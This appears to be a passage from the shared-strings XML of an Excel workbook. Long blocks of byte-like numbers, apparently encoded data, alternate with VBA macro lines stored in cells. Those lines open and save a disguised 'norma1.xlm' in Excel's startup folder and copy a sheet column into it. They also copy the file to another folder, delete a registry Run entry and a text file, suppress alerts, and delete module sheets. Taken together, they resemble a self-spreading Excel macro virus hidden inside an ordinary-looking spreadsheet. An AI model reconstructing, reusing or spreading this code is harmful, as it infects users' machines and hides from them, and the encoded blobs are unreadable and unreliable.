246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">orkbooks.Open Application.StartupPath </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>&amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Application.StartupPath </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>&amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 224 0 60 139 193 181 39 241 65 134 218 59 224 191 155 132 40 142 65 130 187 182 40 165 31 49 196 244 40 60 126 192 116 6 240 2 95 125 9 82 243 133 109 195 66 53 164 21 160 214 0 23 202 161 158 70 112 43 161 158 145 160 212 144 30 90 6 57 84 78 219 6 33 123 200 26 136 243 210 28 245 80 202 67 177 146 73 239 16 206 236 28 81 66 138 135 241 227 108 57 227 100 18 98 112 102 21 180 126 3 252 181 128 63 10 56 224 166 86 0 30 21 67 222 182 196 22 23 121 133 101 21 240 121 160 44 82 93 67 219 56 6 113 18 228 55 90 56 249 151 145 104 95 39 72 78 45 180 109 53 197 166 10 240 156 7 124 51 172 40 161 141 164 57 240 84 3 220 121 140 138 10 106 105 201 78 173 18 105 241 206 4 21 142 191 89 251 134 104 62 108 47 31 192 16 191 162 109 147 203 156 125 235 82 133 60 207 19 158 35 36 149 179 16 180 123 152 1 110 22 55 244 196 91 123 123 235 236 79 59 147 85 44 24 50 255 186 98 28 201 129 86 15 208 126 188 138 246 217 78 192 86 130 191 78 146 61 162 57 81 85 157 200 125 117 25 85 69 99 246 84 231 194 37 89 62 29 24 139 1 158 92 179 214 65 193 150 141 0 118 47 167 165 171 234 147 63 100 186 35 6 2 65 145 27 151 99 0 223 66 178 88 34 220 223 255 141 79 251 63 0 14 255 95 126 228 92 120 41 175 189 189 117 207 210 250 199 187 199 197 123 182 157 159 167 73 188 246 213 121 212 178 238 172 253 205 196 27 6 231 206 209 123 210 219 79 62 37 220 51 101 122 253 182 192 230 252 237 247 215 247 235 249 245 119 71 182 183 150 </t>
  </si>
  <si>
    <t xml:space="preserve">95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 158 42 228 110 73 84 229 151 100 66 174 98 133 45 100 177 164 72 120 125 71 175 122 9 148 246 36 66 65 24 219 99 132 223 152 67 67 168 156 195 15 9 234 21 215 75 225 14 2 195 156 17 150 34 132 92 151 168 42 44 116 19 178 41 17 108 144 0 205 235 97 29 151 8 6 130 8 224 134 4 128 134 152 8 108 185 13 214 129 90 120 89 12 175 198 18 114 119 34 6 24 31 11 1 61 15 36 160 54 11 0 245 9 35 24 243 16 242 116 2 34 218 119 36 228 153 4 65 72 236 179 70 170 28 3 88 47 37 152 181 42 0 203 121 66 246 194 90 155 69 4 21 118 39 151 144 125 137 108 84 51 144 146 89 211 227 21 196 190 139 80 101 186 178 178 226 243 63 161 58 96 85 48 236 40 221 187 142 121 139 157 105 235 113 19 4 11 199 103 158 198 45 41 228 43 221 158 143 169 187 30 120 230 160 35 2 59 167 212 76 77 189 252 51 23 44 241 51 117 21 181 87 121 105 55 166 193 254 54 232 21 38 194 14 42 243 71 69 180 193 240 242 174 190 95 91 251 103 99 29 218 94 211 229 22 99 176 106 205 249 119 220 8 83 173 160 227 248 148 132 223 121 194 240 23 191 15 126 27 219 78 235 192 58 115 112 239 167 135 232 203 30 119 29 195 45 141 118 191 245 142 38 170 220 209 237 164 